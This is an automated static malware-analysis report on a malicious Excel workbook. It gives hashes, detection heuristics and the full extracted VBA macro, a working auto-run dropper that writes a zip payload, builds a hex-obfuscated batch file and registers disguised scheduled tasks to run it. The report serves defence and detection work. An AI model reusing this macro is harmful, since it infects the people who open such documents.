Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 aab04501b7af4c5a…

MALICIOUS

Office (OLE) / .XLS

3.48 MB Created: 2022-08-25 05:25:43 Authoring application: Microsoft Excel First seen: 2026-06-07
MD5: 2e992ef32ea6af5a98cf404121f6a3a0 SHA-1: afc15193e7c0c687551e92bba14d951123d5f03f SHA-256: aab04501b7af4c5a61eac16ff0a82ff1e28d2e3e6ee4f73b3789df22fb93d0c5
232 Risk Score

Heuristics 8

  • ClamAV: Xls.Malware.Sload-7135989-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Sload-7135989-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set fso = CreateObject("Scripting.FileSystemObject")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set fso = CreateObject("Scripting.FileSystemObject")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8880 bytes
SHA-256: bf7872eb19b6c875cbd6eb088873593dae4437bd75ded7799798d2a68e41a4cf
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
Dim strFolderName As String
Dim strFolderExists As String

    strFolderName = "C:\Users\Public\Downloads\dnds.zip"
    strFolderExists = Dir(strFolderName, vbDirectory)

    If strFolderExists = "" Then
        Call dodo
    Else
        MsgBox "The File exists"
    End If
End Sub



Sub dodo()
    Dim row As Long
    Dim path_file As String
    strUserName = Application.UserName
    path_file = "C:\Users\Public\Downloads\dnds.zip"
    Dim ar() As String
    If Len(Dir(path_file)) = 0 Then
        ar = Split(hohoyoyo.TextBox1.Text, "*#&*")
        Dim fileNum As Integer
        Open path_file For Binary As #1
        Seek #1, LOF(1) + 1
        For row = LBound(ar) To UBound(ar)
            Put #1, , CByte(ar(row))
      Next
        Close #1
      End If
      Call file
End Sub
Sub file()

Set fso = CreateObject("Scripting.FileSystemObject")
If Not fso.FolderExists(HexToString("433a5c55736572735c5075626c69635c446f776e6c6f6164735c")) Then
fso.CreateFolder (HexToString("433a5c55736572735c5075626c69635c446f776e6c6f6164735c"))
End If
Set oFile = fso.CreateTextFile(HexToString("433a5c55736572735c5075626c69635c446f776e6c6f6164735c73646e732e747874"))
oFile.WriteLine (HexToString("404543484f206f6666"))
oFile.WriteLine (HexToString("7365746c6f63616c"))
oFile.WriteLine (HexToString("4344202f6420257e647030"))
oFile.WriteLine (HexToString("43414c4c203a556e5a697046696c652022433a5c55736572735c5075626c69635c446f776e6c6f616473222022433a5c55736572735c5075626c69635c446f776e6c6f6164735c646e64732e7a697022"))
oFile.WriteLine (HexToString("45584954202f62"))
oFile.WriteLine (HexToString("3a556e5a697046696c65203c45787472616374546f3e203c6e65777a697066696c653e"))
oFile.WriteLine (HexToString("534554207662733d222574656d70255c5f2e76627322"))
oFile.WriteLine (HexToString("49462045584953542025766273252044454c202f66202f71202576627325"))
oFile.WriteLine (HexToString("3e2576627325204543484f205365742066736f203d204372656174654f626a6563742822536372697074696e672e46696c6553797374656d4f626a6563742229"))
oFile.WriteLine (HexToString("3e3e2576627325204543484f204966204e4f542066736f2e466f6c64657245786973747328253129205468656e"))
oFile.WriteLine (HexToString("3e3e2576627325204543484f2066736f2e437265617465466f6c64657228253129"))
oFile.WriteLine (HexToString("3e3e2576627325204543484f20456e64204966"))
oFile.WriteLine (HexToString("3e3e2576627325204543484f20736574206f626a5368656c6c203d204372656174654f626a65637428225368656c6c2e4170706c69636174696f6e2229"))
oFile.WriteLine (HexToString("3e3e2576627325204543484f207365742046696c6573496e5a69703d6f626a5368656c6c2e4e616d655370616365282532292e6974656d73"))
oFile.WriteLine (HexToString("3e3e2576627325204543484f206f626a5368656c6c2e4e616d655370616365282531292e436f7079486572652846696c6573496e5a697029"))
oFile.WriteLine (HexToString("3e3e2576627325204543484f205365742066736f203d204e6f7468696e67"))
oFile.WriteLine (HexToString("3e3e2576627325204543484f20536574206f626a5368656c6c203d204e6f7468696e67"))
oFile.WriteLine (HexToString("63736372697074202f2f6e6f6c6f676f202576627325"))
oFile.WriteLine (HexToString("49462045584953542025766273252044454c202f66202f71202576627325"))
oFile.WriteLine (HexToString("7363687461736b73202f64656c657465202f746e202053796e5f4e4153202f66"))
oFile.WriteLine (HexToString("72656e20433a5c55736572735c5075626c69635c446f776e6c6f6164735c736e6f6f7020736e6f6f702e626174"))
oFile.WriteLine (HexToString("65786974"))
oFile.Close
Set fso = Nothing
Set oFile = Nothing

   Name (HexToString("433a5c55736572735c5075626c69635c446f776e6c6f6164735c73646e732e747874")) As _
   (HexToString("433a5c55736572735c5075626c69635c446f776e6c6f6164735c73646e732e626174"))
   
Call ikn1iJNyl4GwPbdEQmVAhRheUVCK15i
   End Sub

Public Function HexToString(ByVal HexToStr As String) As String
Dim strTemp   As String
Dim strReturn As String
Dim i         As Long
    For i = 1 To Len(HexToStr) Step 2
        strTemp = Chr$(Val("&H" & Mid$(HexToStr, i, 2)))
        strReturn = strReturn & strTemp
    Next i
    HexToString = strReturn
End Function
Sub ikn1iJNyl4GwPbdEQmVAhRheUVCK15i()
Const TriggerTypeTime = 1

Const ActionTypeExec = 0

Set service = CreateObject("Schedule.Service")
Call service.Connect

Dim rootFolder
Set rootFolder = service.GetFolder("\")

Dim taskDefinition

Set taskDefinition = service.NewTask(0)

Dim regInfo
Set regInfo = taskDefinition.RegistrationInfo
regInfo.Description = "Start Wordpad at a certain time"
regInfo.Author = "Author Name"

Dim principal
Set principal = taskDefinition.principal

principal.LogonType = 3

Dim settings
Set settings = taskDefinition.settings
settings.Enabled = True
settings.StartWhenAvailable = True
settings.Hidden = False

Dim triggers
Set triggers = taskDefinition.triggers

Dim trigger
Set trigger = triggers.Create(TriggerTypeTime)

Dim startTime, endTime

Dim time
time = DateAdd("s", 40, Now)
startTime = XmlTime(time)

time = DateAdd("n", 5, Now)
endTime = XmlTime(time)

trigger.StartBoundary = startTime
trigger.EndBoundary = endTime
trigger.ExecutionTimeLimit = "PT5M"
trigger.ID = "TimeTriggerId"
trigger.Enabled = True

Dim Action
Set Action = taskDefinition.Actions.Create(ActionTypeExec)
Action.Path = "C:\Users\Public\Downloads\sdns.bat"

Call rootFolder.RegisterTaskDefinition( _
    "Syn_NAS", taskDefinition, 6, , , 3)
Call ikn1iJNyl4GwPbdEQmVAhRheU
End Sub

Sub ikn1iJNyl4GwPbdEQmVAhRheU()
Const TriggerTypeTime = 1

Const ActionTypeExec = 0

Set service = CreateObject("Schedule.Service")
Call service.Connect

Dim rootFolder
Set rootFolder = service.GetFolder("\")

Dim taskDefinition

Set taskDefinition = service.NewTask(0)

Dim regInfo
Set regInfo = taskDefinition.RegistrationInfo
regInfo.Description = "Start Wordpad at a certain time"
regInfo.Author = "Author Name"

Dim principal
Set principal = taskDefinition.principal

principal.LogonType = 3

Dim settings
Set settings = taskDefinition.settings
settings.Enabled = True
settings.StartWhenAvailable = True
settings.Hidden = False

Dim triggers
Set triggers = taskDefinition.triggers

Dim trigger
Set trigger = triggers.Create(TriggerTypeTime)

Dim startTime, endTime

Dim time
time = DateAdd("s", 55, Now)
startTime = XmlTime(time)

time = DateAdd("n", 5, Now)
endTime = XmlTime(time)

trigger.StartBoundary = startTime
trigger.EndBoundary = endTime
trigger.ExecutionTimeLimit = "PT5M"
trigger.ID = "TimeTriggerId"
trigger.Enabled = True

Dim Action
Set Action = taskDefinition.Actions.Create(ActionTypeExec)
Action.Path = "C:\Users\Public\Downloads\snoop.bat"

Call rootFolder.RegisterTaskDefinition( _
    "Syn_HDD", taskDefinition, 6, , , 3)
End Sub

Function XmlTime(t)
    Dim cSecond, cMinute, CHour, cDay, cMonth, cYear
    Dim tTime, tDate

    cSecond = "0" & Second(t)
    cMinute = "0" & Minute(t)
    CHour = "0" & Hour(t)
    cDay = "0" & Day(t)
    cMonth = "0" & Month(t)
    cYear = Year(t)

    tTime = Right(CHour, 2) & ":" & Right(cMinute, 2) & _
        ":" & Right(cSecond, 2)
    tDate = cYear & "-" & Right(cMonth, 2) & "-" & Right(cDay, 2)
    XmlTime = tDate & "T" & tTime
End Function


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "hohoyoyo"
Attribute VB_Base = "0{47230D4E-3860-4CFD-9901-F08061DC0669}{3A173ECD-7518-4AA7-A0C3-5E129271FF0F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Private Sub TextBox1_Change()

End Sub

Private Sub TextBox3_Change()

End Sub